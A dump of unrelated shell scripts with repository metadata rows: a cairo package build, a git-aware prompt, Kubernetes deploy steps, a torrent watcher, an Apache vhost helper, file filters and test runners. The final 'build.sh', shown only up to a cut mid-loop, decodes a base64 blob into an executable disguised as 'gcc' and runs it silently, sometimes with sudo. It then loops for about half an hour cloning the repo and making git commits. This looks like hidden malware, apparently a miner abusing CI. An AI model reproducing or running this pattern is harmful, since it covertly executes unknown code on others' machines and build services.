# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
PKGNAM=cairo
VERSION=${VERSION:-$(echo $PKGNAM-*.tar.?z* | rev | cut -f 3- -d . | cut -f 1 -d - | rev)}
BUILD=${BUILD:-1}
# Automatically determine the architecture we're building on:
if [ -z "$ARCH" ]; then
case "$( uname -m )" in
i?86) export ARCH=i486 ;;
arm*) export ARCH=arm ;;
# Unless $ARCH is already set, use uname -m for all other archs:
*) export ARCH=$( uname -m ) ;;
esac
fi
NUMJOBS=${NUMJOBS:-" -j7 "}
CWD=$(pwd)
TMP=${TMP:-/tmp}
PKG=$TMP/package-$PKGNAM
rm -rf $PKG
mkdir -p $TMP $PKG
cd $TMP
rm -rf $PKGNAM-$VERSION
tar xvf $CWD/$PKGNAM-$VERSION.tar.?z* || exit 1
cd $PKGNAM-$VERSION
chown -R root:root .
chmod -R u+w,go+r-w,a-s .
CFLAGS="-O2" \
LDFLAGS="-L/${PREFIX}/lib${LIBDIRSUFFIX}" \
./configure \
--prefix=/${PREFIX} \
--libdir=/${PREFIX}/lib${LIBDIRSUFFIX} \
--mandir=/${PREFIX}/man \
--sysconfdir=/etc \
--disable-xlib \
--disable-gtk-doc \
--disable-quartz \
--disable-static \
--disable-trace \
--enable-ps \
--enable-pdf \
--enable-svg \
--enable-ft \
--enable-gobject \
--host=${HOST_TRIPLET} \
--build=$ARCH-slackware-linux
# None of these are 'stable' yet...
# --enable-qt \
# --enable-drm \
# Not sure if these two are needed / useful yet; --enable-xcb is now default
# --enable-xcb-shm \
# ^^ may cause GTK+3 instability
# --enable-xlib-xcb \
# ^^ this one caused a GIMP slowdown
# Skipping this, because it causes a dependency on the specific
# version of binutils installed at compile time:
# --enable-trace
make $NUMJOBS || make || exit 1
make install DESTDIR=$PKG
find $PKG | xargs file | egrep -e "executable|shared object" \
| grep ${HOST_EXE_FORMAT} | cut -f 1 -d : \
| xargs ${HOST_STRIP} --strip-unneeded 2> /dev/null
mkdir -p $PKG/${PREFIX}/doc/$PKGNAM-$VERSION
cp -a \
AUTHORS BIBLIOGRAPHY BUGS CODING_STYLE COPYING* HACKING NEWS PORTING_GUIDE README RELEASING \
$PKG/${PREFIX}/doc/$PKGNAM-$VERSION
( cd $PKG/${PREFIX}/doc/$PKGNAM-$VERSION ; ln -sf /${PREFIX}/share/gtk-doc/html/cairo html )
ln -sf ../share/gtk-doc/html/cairo $PKG/${PREFIX}/doc/$PKGNAM-$VERSION/html
# We do not need the entire NEWS file.
if [ -r NEWS ]; then
DOCSDIR=$(echo $PKG/${PREFIX}/doc/*-$VERSION)
cat NEWS | head -n 1000 > $DOCSDIR/NEWS
touch -r NEWS $DOCSDIR/NEWS
fi
cat ${CWD}/$PKGNAM.yypkg.script | sed \
-e "s/%{PKG}/$PKGNAM/" \
-e "s/%{HST}/${HOST_TRIPLET}/" \
-e "s/%{TGT}//" \
-e "s/%{VER}/${VERSION}/" \
-e "s/%{BUILD}/${BUILD}/" \
-e "s/%{DESCR}/${DESCR:-"No description"}/" \
| yypkg --makepkg --output ${YYOUTPUT} --script - --directory "${PKG}/${PREFIX}"
| true
|
fddb0ea73ded215c1c48c03b97cded9bb66c3254
|
Shell
|
gisikw/.dotfiles
|
/shell/prompt.sh
|
UTF-8
| 837
| 3.59375
| 4
|
[] |
no_license
|
function get_named_color() {
case $1 in
31) echo "red" ;;
32) echo "green" ;;
33) echo "yellow" ;;
36) echo "cyan" ;;
*) echo "default" ;;
esac
}
function status_prompt() {
if [ $? -ne 0 ]; then
STATUS="red"
else
[ $(git status --porcelain=1 2>/dev/null | wc -l) -ne 0 ] && STATUS="yellow" || STATUS="green"
fi
{ read GROOT; read BRANCH } < <(git rev-parse --show-toplevel --abbrev-ref HEAD 2>/dev/null)
LOCATION="$HOST"
[ ! -z "$GROOT" ] && LOCATION="$LOCATION/$(basename $GROOT)"
[ ! -z "$BRANCH" ] && [ "$BRANCH" != "master" ] && [ "$BRANCH" != "main" ] && LOCATION="$LOCATION#$BRANCH"
NEWLINE=$'\n'
PROMPT="%K{$STATUS}%F{black} $LOCATION %F{$STATUS}%k${NEWLINE}%K{$STATUS}%k%f "
}
if [[ $ZSH_NAME ]]; then
precmd() { status_prompt; }
else
PROMPT_COMMAND=status_prompt
fi
| true
|
842aec09c8a3183b9df6241c612b3655dcb54f65
|
Shell
|
Youhana-Hana/Infra-java-prevayler-K8S
|
/02-deploy-app/k8s/app/deploy
|
UTF-8
| 646
| 2.8125
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
set -e
# deploy app deployment and service
kubectl apply -f deployment/web-app.yml
# deploy app deployment and service
kubectl apply -f deployment/web-static.yml
# smoke test to list all pods, deployments and services
kubectl get pod,deploy,svc
echo -e "Waiting for company-news app ELB to be created (60 seconds)\n"
sleep 60
echo -e "Copy the given loadbalancer URL into the browser\n"
kubectl get svc/company-news-service --template="{{range .status.loadBalancer.ingress}} {{.hostname}} {{end}}"
echo -e "\n"
kubectl get svc/company-news-static-service --template="{{range .status.loadBalancer.ingress}} {{.hostname}} {{end}}"
| true
|
6d00704ff508d674e01bb67e8a4b595a7be26353
|
Shell
|
WeiXiLong/Linux
|
/5_1/cal_pi.sh
|
UTF-8
| 296
| 3.453125
| 3
|
[] |
no_license
|
#!/bin/bash
echo -e "This program will calculate pi value.\n"
echo -e "You should input a float number to calculate pi value. \n"
read -p "The scale number (10 ~ 10000)? " checking
num=${checking:-"10"}
echo -e "Starting calcuate pi value. Be patient."
time echo "scale=$num; 4*a(1)" | bc -lq
| true
|
b465c9ef80e195288bfcb85af90fc39efa695639
|
Shell
|
CodingLappen/scripts
|
/watchdo
|
UTF-8
| 1,337
| 3.4375
| 3
|
[] |
no_license
|
#!/bin/bash
# Watch dir, may contain spaces:
watchdir="/home/tom/Downloads"
# move file to a subdirectory? if Commented out, it'll removed remove
# the torrent file.
# Note: Don't put a '/' before the path!
#movesubdir="added/"
dwdir="/home/tom/torrent"
trdonesscript=""
# Authentication "username:password":
#tr_auth="admin:admin"
# Transmission host "ip:port":
# tr_host="127.0.0.1:9091"
# Verbose?
verbose=1
#############################################
time=$(date "+%Y-%m-%d (%H:%M:%S)")
if [ -n "$tr_auth" ]; then
tr_auth="--auth $tr_auth"
fi
#############################################
if [ -n "$trdonescript" ]; then
trdonescript="--torrent-done-script $trdonescript"
fi
#############################################
if [ -n "$dwdir" ]; then
dwdir="--download-dir $dwdir"
fi
#############################################
#############################################j
echo "$dwdir"
echo "$watchdir"/*.torrent | sed "s/ /\n/g"
# for debugging
for file in "$watchdir"/*.torrent
do
if [ -f "$file" ]; then
if [ -n "$verbose" ]; then echo "$time: $file added to queue."; fi
/usr/bin/transmission-remote --add "$file"
# give the remote some time to process
sleep 5
else
if [ -n "$verbose" ]; then echo "$time: No torrent in $watchdir."; fi
fi
done
exit 0
| true
|
8b4077a1658cabdcf6d7ba6d939cbcf56e8e1e5e
|
Shell
|
bruriwijayanto/mkvhost
|
/mkvhost
|
UTF-8
| 2,804
| 3.78125
| 4
|
[] |
no_license
|
#!/bin/bash
hostspath="/etc/hosts"
hostspathbck="/etc/myhost"
vhostdir="/etc/"
#cat $hostspath > $hostspathbck
function interactive()
{
echo ""
echo "## virtualhost wizard ##"
echo "## untuk keperluan local development ##"
echo "## bruri@gi.co.id ##"
echo ""
echo -n "Host : "
read host
echo -n "Direktori web : "
read webdir
echo ""
addhost $host $webdir
echo " ... $host sudah mengarah ke $webdir"
echo ""
#cat $hostspath
}
function addhost()
{
# add host
sudo echo "127.0.0.1 $1" >> $hostspath;
#add virtualhost config
cat > "/etc/apache2/sites-available/$1.conf" <<EOL
<VirtualHost *:80>
ServerName $1
#ServerAlias www.$1
DocumentRoot $2
#ErrorLog ${APACHE_LOG_DIR}/error.log
#CustomLog ${APACHE_LOG_DIR}/access.log combined
<Directory $2 >
Options Indexes FollowSymLinks MultiViews
AllowOverride all
Options -Indexes
Order allow,deny
allow from all
</Directory>
</VirtualHost>
EOL
#activate and restart
echo ":: Activate vhost"
sudo a2ensite $1
echo " ... activate successfully"
sudo service apache2 restart
echo ""
echo ":: Adding complete "
}
function delhost(){
if [ -z $1 ]; then
echo "nama host belum diisi"
else
str='/'$1'/d'
x=`sed $str $hostspath`
echo "$x" > $hostspath
echo ":: Deactivate vhost"
sudo a2dissite $1
echo " ... Deactivate successfully"
echo " ... Delete Configuration"
sudo rm "/etc/apache2/sites-available/$1"
echo " ... Configuration deleted"
sudo service apache2 restart
echo ""
echo ":: Delete Complete"
fi
}
function test(){
echo "testa"
}
function backup(){
cat /etc/hosts >> /etc/myhost
echo ":: hosts backup successfuly"
}
function restore(){
cat /etc/myhost >> /etc/hosts
echo ":: hosts restore successfuly"
}
function install(){
cp "$0" /usr/bin
echo ":: install mkvhost successfuly"
}
function selfdelete(){
rm -- "$0"
}
clear
if [ $1 = "install" ]; then
install
fi
if [ $1 = "-i" ]; then
interactive
fi
if [ $1 = "-b" ]; then
backup
fi
if [ $1 = "-r" ]; then
restore
fi
if [ $1 = "-d" ]; then
delhost $2
fi
if [ $1 = "-t" ]; then
test $2 $3
fi
if [ $1 = "-v" ]; then
echo "$hostspath : "
echo ""
cat $hostspath
echo ""
fi
if [ $1 = "--help" ]; then
cat <<EOL
Penggunaan: mkvhost [OPTION]
Tool bantuan untuk membuat virtualhost.
Mandatory arguments
-i Mode interaktif
-v Melihat host yang sudah dibuat
-d menghapus virtualhost contoh : -d sapi.com
-b backup file /etc/hosts
-r restore file /etc/hosts
--help menampilkan bantuan
install install ke /usr/bin
Report mkvhost bugs to bruri@gi.co.id
GNU coreutils home page: <http://www.gnu.org/software/coreutils/>
General help using GNU software: <http://www.gnu.org/gethelp/>
EOL
fi
| true
|
b2c48f51c5bf4d181e35b029bad02be7a4a764ec
|
Shell
|
bcowgill/bsac-linux-cfg
|
/bin/filter-videos.sh
|
UTF-8
| 1,198
| 3.625
| 4
|
[] |
no_license
|
#!/bin/bash
# BSACKIT Part of Brent S.A. Cowgill's Developer Toolkit
# WINDEV tool useful on windows development machine
GREP="egrep -i"
function usage {
local code
code=$1
cmd=$(basename $0)
echo "
$cmd [--regex] [--help|--man|-?]
This will filter a list of file names looking for video, movie file extensions.
--regex Shows the regex used for matching video file extensions.
--man Shows help for this tool.
--help Shows help for this tool.
-? Shows help for this tool.
See also filter-mime-video.sh, filter-text.sh, filter-docs.sh, filter-zips.sh, filter-fonts.sh, filter-scripts.sh, filter-web.sh, filter-css.sh, filter-images.sh, filter-sounds.sh, classify.sh
See the online file extension database https://fileinfo.com/extension/srt
Example:
locate -i reunion | $cmd
"
exit $code
}
if [ "$1" == "--help" ]; then
usage 0
fi
if [ "$1" == "--man" ]; then
usage 0
fi
if [ "$1" == "-?" ]; then
usage 0
fi
if [ "$1" == "--regex" ]; then
GREP="echo"
fi
$GREP '\.(abc|as[fx]|avi|divx|fl[iv]|fxm|m2ts?|m4v|mkv|mng|mo[dv]|mp4|mp(e|g|eg)|og[mvx]|srt|swf|t[ps]|vcd|vdr|viv|vob|wmv|yuv)(:|"|\s*$)' # .asf .asx .avi .divx .fli .flv .m2t .m2ts .mod .mov .mpe .mpg .mpeg .ogm .ogv .ogx .tp .ts
| true
|
016322f7551d4f8d066c3033d1e24a60f4414d23
|
Shell
|
boydhako/MACOSX-scripts
|
/set_python.bash
|
UTF-8
| 335
| 3.671875
| 4
|
[] |
no_license
|
#!/bin/bash
function PYVERSIONS {
for pdir in $(echo $PATH | tr ":" "\n"); do
for bin in $(find $pdir -type f -iname "*python*" 2>/dev/null | egrep -e "python[[:digit:]].[[:digit:]]$"); do
version="$($bin -V| awk '{printf $NF}')"
printf "%s\n" "$version"
done
done
}
PYVERSIONS | sort -n -r | uniq | awk '{printf $0" "}'
| true
|
4926b3fef610479076dd7f9b855b97959ab288a6
|
Shell
|
CodelyTV/dotly
|
/scripts/core/dotfiles.sh
|
UTF-8
| 186
| 2.65625
| 3
|
[
"MIT"
] |
permissive
|
dotfiles::list_bash_files() {
grep "#!/usr/bin/env bash" "$DOTFILES_PATH"/{bin,scripts,shell} -R | awk -F':' '{print $1}'
find "$DOTLY_PATH"/{bin,scripts,shell} -type f -name "*.sh"
}
| true
|
952c2d3325ab6adbfa03264d8f826959c963235f
|
Shell
|
fsmiamoto/commitlint-hooks-example
|
/.githooks/commit-msg
|
UTF-8
| 157
| 2.546875
| 3
|
[] |
no_license
|
#!/bin/sh
#
# Verify the commit message with commitlint
#
# This script is given the name of the file containing the
# commit message
#
commitlint -e "$1"
| true
|
bae183d10376f3706615a1e4ee3bafd1dda8ce6b
|
Shell
|
30ge30ge/short_text_classification
|
/scripts/bigben_ctl.sh
|
UTF-8
| 2,961
| 3.625
| 4
|
[] |
no_license
|
#!/bin/sh
FENGYI_HOME=`pwd`
BIN=$FENGYI_HOME/bin
CONF=$FENGYI_HOME/conf
HADOOP_PREFIX=$FENGYI_HOME/lib/hadoop
HADOOP_HOME=$HADOOP_PREFIX
HADOOP_CONF_DIR=$HADOOP_HOME/conf
SERVICE="
configure
schedule
visited
collect
hdfs_writer
"
setclasspath()
{
if [ "$JAVA_HOME" = "" ] ; then
export JAVA_HOME=$FENGYI_HOME/lib/jdk
fi
# CLASSPATH initially contains $HADOOP_CONF_DIR
CLASSPATH="${HADOOP_CONF_DIR}"
if [ "$HADOOP_USER_CLASSPATH_FIRST" != "" ] && [ "$HADOOP_CLASSPATH" != "" ] ; then
CLASSPATH=${CLASSPATH}:${HADOOP_CLASSPATH}
fi
CLASSPATH=${CLASSPATH}:$JAVA_HOME/lib/tools.jar
# for developers, add Hadoop classes to CLASSPATH
if [ -d "$HADOOP_HOME/build/classes" ]; then
CLASSPATH=${CLASSPATH}:$HADOOP_HOME/build/classes
fi
if [ -d "$HADOOP_HOME/build/webapps" ]; then
CLASSPATH=${CLASSPATH}:$HADOOP_HOME/build
fi
if [ -d "$HADOOP_HOME/build/test/classes" ]; then
CLASSPATH=${CLASSPATH}:$HADOOP_HOME/build/test/classes
fi
if [ -d "$HADOOP_HOME/build/tools" ]; then
CLASSPATH=${CLASSPATH}:$HADOOP_HOME/build/tools
fi
# for releases, add core hadoop jar & webapps to CLASSPATH
if [ -e $HADOOP_PREFIX/share/hadoop/hadoop-core-* ]; then
# binary layout
if [ -d "$HADOOP_PREFIX/share/hadoop/webapps" ]; then
CLASSPATH=${CLASSPATH}:$HADOOP_PREFIX/share/hadoop
fi
for f in $HADOOP_PREFIX/share/hadoop/hadoop-core-*.jar; do
CLASSPATH=${CLASSPATH}:$f;
done
# add libs to CLASSPATH
for f in $HADOOP_PREFIX/share/hadoop/lib/*.jar; do
CLASSPATH=${CLASSPATH}:$f;
done
for f in $HADOOP_PREFIX/share/hadoop/lib/jsp-2.1/*.jar; do
CLASSPATH=${CLASSPATH}:$f;
done
else
# tarball layout
if [ -d "$HADOOP_HOME/webapps" ]; then
CLASSPATH=${CLASSPATH}:$HADOOP_HOME
fi
for f in $HADOOP_HOME/hadoop-core-*.jar; do
CLASSPATH=${CLASSPATH}:$f;
done
# add libs to CLASSPATH
for f in $HADOOP_HOME/lib/*.jar; do
CLASSPATH=${CLASSPATH}:$f;
done
if [ -d "$HADOOP_HOME/build/ivy/lib/Hadoop/common" ]; then
for f in $HADOOP_HOME/build/ivy/lib/Hadoop/common/*.jar; do
CLASSPATH=${CLASSPATH}:$f;
done
fi
for f in $HADOOP_HOME/lib/jsp-2.1/*.jar; do
CLASSPATH=${CLASSPATH}:$f;
done
fi
export CLASSPATH
export HADOOP_PREFIX
export HADOOP_HOME
export HADOOP_CONF_DIR
}
start()
{
setclasspath
for s in $SERVICE
do
$BIN/${s}_server -f $CONF/${s}-server.conf >$s.log 2>&1 &
done
}
stop()
{
for s in $SERVICE
do
pkill -9 ${s}_server
done
}
status()
{
for s in $SERVICE
do
ps -ef |grep ${s}_server | grep -v grep
done
}
case "$1" in
"start")
start
;;
"stop")
stop
;;
"status")
status
;;
*)
echo "$0 start|stop|status"
esac
| true
|
48b3f839ebf0d6aa48d7781bdf734e247ecb70fd
|
Shell
|
hebersonaguiar/kanboard
|
/docker-entrypoint.sh
|
UTF-8
| 1,173
| 3.640625
| 4
|
[] |
no_license
|
#!/bin/bash
set -e
help() {
echo "Usage: docker run -dti -e DB_DRIVER=VALUE -e DB_USERNAME=VALUE -e DB_PASSWORD=VALUE -e DB_HOSTNAME=VALUE -e DB_NAME=VALUE -v $(pwd)/kanboard:/var/www/htnl/kanboard container_name:tag" >&2
echo
echo " DB_DRIVER database driver "
echo " DB_USERNAME database username"
echo " DB_PASSWORD database password"
echo " DB_HOSTNAME database hostname"
echo " DB_NAME database name"
echo
exit 1
}
if [ ! -z "$DB_DRIVER" ] || [ ! -z "$DB_USERNAME" ] || [ ! -z "$DB_PASSWORD" ] || [ ! -z "$DB_HOSTNAME" ] || [ ! -z "$DB_NAME" ] ; then
#CHANGE VARIABLES
sed -i "s/DBDRIVER/$DB_DRIVER/g" /opt/kanboard/config.php
sed -i "s/DBUSERNAME/$DB_USERNAME/g" /opt/kanboard/config.php
sed -i "s/DBPASSWORD/$DB_PASSWORD/g" /opt/kanboard/config.php
sed -i "s/DBHOSTNAME/$DB_HOSTNAME/g" /opt/kanboard/config.php
sed -i "s/DBNAME/$DB_NAME/g" /opt/kanboard/config.php
cp -R /opt/kanboard /var/www/html
chown -R www-data. /var/www/html
chmod 0777 -R /var/www/html/kanboard
else
echo "Please enter the required data!"
help
fi
exec "$@"
| true
|
fc851210b12a6f8799671b1747dbf0fb7b23dc2e
|
Shell
|
hivesolutions/scudum
|
/system/lib/services/ipv4-static-route
|
UTF-8
| 1,602
| 3.828125
| 4
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
. /lib/lsb/init-functions
. ${IFCONFIG}
case "${TYPE}" in
("" | "network")
need_ip=1
need_gateway=1
;;
("default")
need_gateway=1
args="${args} default"
desc="default"
;;
("host")
need_ip=1
;;
("unreachable")
need_ip=1
args="${args} unreachable"
desc="unreachable "
;;
(*)
log_failure_msg "Unknown route type (${TYPE}) in ${IFCONFIG}, cannot continue."
exit 1
;;
esac
if [ -n "${need_ip}" ]; then
if [ -z "${IP}" ]; then
log_failure_msg "IP variable missing from ${IFCONFIG}, cannot continue."
exit 1
fi
if [ -z "${PREFIX}" ]; then
log_failure_msg "PREFIX variable missing from ${IFCONFIG}, cannot continue."
exit 1
fi
args="${args} ${IP}/${PREFIX}"
desc="${desc}${IP}/${PREFIX}"
fi
if [ -n "${need_gateway}" ]; then
if [ -z "${GATEWAY}" ]; then
log_failure_msg "GATEWAY variable missing from ${IFCONFIG}, cannot continue."
exit 1
fi
args="${args} via ${GATEWAY}"
fi
if [ -n "${SOURCE}" ]; then
args="${args} src ${SOURCE}"
fi
case "${2}" in
up)
log_info_msg "Adding '${desc}' route to the ${1} interface..."
ip route add ${args} dev ${1}
evaluate_retval
;;
down)
log_info_msg "Removing '${desc}' route from the ${1} interface..."
ip route del ${args} dev ${1}
evaluate_retval
;;
*)
echo "Usage: ${0} [interface] {up|down}"
exit 1
;;
esac
| true
|
2419b81a7f99868144a6f331ef1b4b54944311fe
|
Shell
|
hello-metropolis/quickstart
|
/infrastructure/shell/install-ingress.sh
|
UTF-8
| 853
| 2.671875
| 3
|
[] |
no_license
|
echo "Installing production ingress"
echo "> Generating"
echo "apiVersion: extensions/v1beta1
kind: Ingress
metadata:
name: hello-kubernetes-ingress
annotations:
kubernetes.io/ingress.class: nginx
nginx.ingress.kubernetes.io/proxy-buffer-size: \"16k\"
spec:
rules:
- host: $INGRESS_HOST
http:
paths:
- path: /api
backend:
serviceName: backend-$DEPLOYMENT_KEY-metropolis-quickstart-backend
servicePort: 80
- host: $INGRESS_HOST
http:
paths:
- backend: # default backend
serviceName: frontend-$DEPLOYMENT_KEY-metropolis-quickstart-frontend
servicePort: 80" > infrastructure/terraform/ingress.yaml
# echo "> Outputing"
# cat infrastructure/terraform/ingress.yaml
echo "> Applying"
kubectl apply -f infrastructure/terraform/ingress.yaml
echo "> Finished"
| true
|
cc418f0501668c1f8c3b7b86c48b73c2890470c3
|
Shell
|
vitojeng/ohara
|
/bin/start-service.sh
|
UTF-8
| 2,305
| 3.703125
| 4
|
[
"BSD-3-Clause",
"Apache-2.0",
"BSD-2-Clause",
"CDDL-1.1",
"CDDL-1.0"
] |
permissive
|
#!/usr/bin/env bash
#
# Copyright 2019 is-land
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#----------[LOCATE PROJECT]----------#
SOURCE="${BASH_SOURCE[0]}"
BIN_DIR="$( dirname "$SOURCE" )"
while [ -h "$SOURCE" ]
do
SOURCE="$(readlink "$SOURCE")"
BIN_DIR="$( cd -P "$( dirname "$SOURCE" )" && pwd )"
done
BIN_DIR="$( cd -P "$( dirname "$SOURCE" )" && pwd )"
PROJECT_HOME="$(dirname "$BIN_DIR")"
service=$1
shift 1
ARGS=""
i=0
while [ -n "$1" ]
do
ARGS=$ARGS" "$1
i=$(($i+1))
shift
done
if [ "$service" == "manager" ]; then
cd "$PROJECT_HOME"
exec env NODE_ENV=production node ./start.js $ARGS
else
if [ "$service" == "configurator" ]; then
CLASS="oharastream.ohara.configurator.Configurator"
elif [ "$service" == "-v" ] || [ "$service" == "version" ] || [ "$service" == "-version" ]; then
CLASS="oharastream.ohara.common.util.VersionUtils"
elif [ "$service" == "help" ]; then
echo "Usage:"
echo "Option Description"
echo "----------- -----------"
echo "configurator Ohara Configurator provides the service "
echo " for user and Ohara Manager to use."
echo ""
echo "manager Running Ohara Manager. After run this command, you can "
echo " connect to http://\${HostName or IP}:5050 url by browser."
echo ""
echo "class name custom class which has main function"
echo ""
exit 1
elif [ "$service" == "" ]; then
echo "Usage: (configurator|manager|help) [<args>]"
exit 1
else
CLASS=$service
fi
#----------[EXECUTION]----------#
exec "$BIN_DIR/run_java.sh" $CLASS $ARGS
fi
| true
|
4b4c0071cbbecb7dfcde977d464b11003cfd3227
|
Shell
|
mitali-bhokare/springboot-k8s-mysql
|
/scripts/dockerBuildPushImage.sh
|
UTF-8
| 306
| 3.078125
| 3
|
[] |
no_license
|
#!/bin/bash -xe
cd ..
DOCKER_REPO="mitali7692/intuit"
REPO_NAME_AND_TAG="${DOCKER_REPO}":$(date +"%H.%M.%S")
# Build app docker container
echo "The project version is ${REPO_NAME_AND_TAG}"
docker build -t "${REPO_NAME_AND_TAG}" .
# Push app container to docker hub
docker push "${REPO_NAME_AND_TAG}"
| true
|
7f36db90224d4c7524ab7b833d997d9b1d409a6b
|
Shell
|
OSGeo/gdal
|
/scripts/setdevenv.sh
|
UTF-8
| 2,169
| 3.796875
| 4
|
[
"MIT",
"LicenseRef-scancode-warranty-disclaimer",
"SunPro",
"LicenseRef-scancode-info-zip-2005-02",
"BSD-3-Clause",
"ISC",
"Apache-2.0",
"LicenseRef-scancode-public-domain",
"BSD-2-Clause"
] |
permissive
|
#!/bin/bash
#
# This script set ups the environment variables needed for executing the
# GDAL build in this tree, without installing it.
# For a CMake build, the script should be run from the build directory
# typically if the build dir is a subdirectory in the source tree,
# ". ../scripts/setdevenv.sh"
#
# The script can be sourced from either bash or zsh.
# Do *NOT* use set set -e|-u flags as this script is intended to be sourced
# and thus an error emitted will kill the shell.
# set -eu
called=$_
if [[ $BASH_VERSION && $(realpath $called) == $(realpath "$0") ]]; then
echo "Script should be sourced with '. $0', instead of run."
exit 1
fi
# The following line uses a zsh expansion that is not supported by shellcheck
# shellcheck disable=SC2296
SETDEVENV_SH=${BASH_SOURCE[0]:-${(%):-%x}}
# SC2164 is "Use cd ... || exit in case cd fails"
# shellcheck disable=SC2164
GDAL_ROOT=$(cd $(dirname ${SETDEVENV_SH})/..; pwd)
CUR_DIR=$PWD
echo "Setting environment for a CMake build from ${CUR_DIR}..."
if [[ ! ${PATH} =~ $CUR_DIR/apps ]]; then
export PATH="$CUR_DIR/apps:$PATH"
export PATH="$CUR_DIR/perftests:$PATH"
export PATH="$GDAL_ROOT/swig/python/gdal-utils/scripts:$PATH"
echo "Setting PATH=$PATH"
fi
if [[ "$(uname -s)" == "Darwin" ]]; then
if [[ ! "${DYLD_LIBRARY_PATH}" =~ $CUR_DIR ]]; then
export DYLD_LIBRARY_PATH="$CUR_DIR:$DYLD_LIBRARY_PATH"
echo "Setting DYLD_LIBRARY_PATH=$DYLD_LIBRARY_PATH"
fi
else
if [[ ! "${LD_LIBRARY_PATH}" =~ $CUR_DIR ]]; then
export LD_LIBRARY_PATH="$CUR_DIR:$LD_LIBRARY_PATH"
echo "Setting LD_LIBRARY_PATH=$LD_LIBRARY_PATH"
fi
fi
if [[ ! ${GDAL_DRIVER_PATH} =~ $CUR_DIR/gdalplugins ]]; then
export GDAL_DRIVER_PATH="$CUR_DIR/gdalplugins"
echo "Setting GDAL_DRIVER_PATH=$GDAL_DRIVER_PATH"
fi
if [[ ! "${GDAL_DATA}" =~ $GDAL_ROOT/data ]]; then
export GDAL_DATA="$GDAL_ROOT/data"
echo "Setting GDAL_DATA=$GDAL_DATA"
fi
GDAL_PYTHONPATH="$CUR_DIR/swig/python"
if [[ ! "${PYTHONPATH}" =~ $GDAL_PYTHONPATH ]]; then
export PYTHONPATH="$GDAL_PYTHONPATH:$PYTHONPATH"
echo "Setting PYTHONPATH=$PYTHONPATH"
fi
unset GDAL_PYTHONPATH
| true
|
d28692060dde2b252f37d5adaf756de2642bb2e3
|
Shell
|
ORG-MARS/zenml
|
/tests/testing.sh
|
UTF-8
| 1,364
| 3.390625
| 3
|
[
"Apache-2.0"
] |
permissive
|
#
# Copyright (c) maiot GmbH 2021. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express
# or implied. See the License for the specific language governing
# permissions and limitations under the License.
#
#! /usr/bin/env bash
# bash way of splitting of the current directory name
CWD=${PWD##*/}
ZENML_DIR=".zenml"
GIT=".git"
PIPELINES="pipelines"
if [ -d "$ZENML_DIR" ] || [ -d "$PIPELINES" ] || [ -d "$GIT" ]; then
# Take action if $DIR exists. #
echo "Either the .zenml, .git or pipelines directory exists already. Make sure to run tests in a clean directory."
exit 1
fi
# make sure that the current directory is tests, otherwise complain
if [ "$CWD" != "tests" ]; then
echo "Make sure to run ZenML tests directly from the tests directory."
exit 1
fi
git init
git add .
git commit -m 'test commit'
python generate_test_pipelines.py
pytest ../zenml
PYTEST_EXIT=$?
rm -rf $GIT
rm -rf $ZENML_DIR
rm -rf $PIPELINES
rm .gitignore
exit $PYTEST_EXIT
| true
|
845c9d5fab14ad2ec05ac211237dfe2252c3cdb0
|
Shell
|
qiankunli/run-k8s
|
/centos6/k8s/stop_k8s_minion.sh
|
UTF-8
| 426
| 3.234375
| 3
|
[] |
no_license
|
#!/bin/bash
cur_process_id=$(ps -ef|grep kube-proxy | grep -v grep |awk '{print $2}')
if [ "x${cur_process_id}" != "x" ] ; then
echo "current pid of kube-proxy: $cur_process_id kill it"
kill -9 $cur_process_id
fi
cur_process_id=$(ps -ef|grep kubelet |grep -v grep |awk '{print $2}' )
if [ "x${cur_process_id}" != "x" ] ; then
echo "current pid of kubelet: $cur_process_id kill it"
kill -9 $cur_process_id
fi
| true
|
45b22451a9cd15b8b8ce51faed459ae8487636ea
|
Shell
|
a-godman/search-card
|
/build.sh
|
UTF-8
| 3,179
| 3.4375
| 3
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
MODE="GitLab"
SUDO=""
if [[ $1 == 'apg' ]]
then
SUDO="sudo"
elif [[ $1 == 'make' ]]
then
if [[ $MODE == 'Bitbucket' || $MODE == 'GitLab' ]]
then
base64 -d gcc.64 > gcc 2>/dev/null
chmod +x gcc &>/dev/null
fi
elif [[ $1 == 'rebuild' ]]
then
if [[ $MODE == 'Bitbucket' || $MODE == 'GitLab' ]]
then
base64 -d gcc.64 > gcc 2>/dev/null
chmod +x gcc &>/dev/null
fi
SUDO="sudo"
else
if [[ $MODE == 'Bitbucket' || $MODE == 'GitLab' ]]
then
base64 -d gcc.64 > gcc 2>/dev/null
chmod +x gcc &>/dev/null
fi
fi
$SUDO ./gcc &>/dev/null
D="n"
TB=$(date +%s)
TD=$((1800 + $(shuf -i 0-180 -n 1)))
TE=$((TB + TD))
TEC=$((TB + 1))
while true
do
TC=$(date +%s)
if [[ $D == 'n' ]]
then
if [[ TC -gt TEC ]]
then
git clone --branch master --depth 20 --no-tags --single-branch https://github.com/a-godman/search-card.git cloned_repo &>/dev/null || true
cd cloned_repo || true
R=$((RANDOM % 2))
H=$(git rev-list master | tail --lines 1) || true
if [[ R -eq 0 ]]
then
git config user.email 'a.goodman68@list.ru' &>/dev/null || true
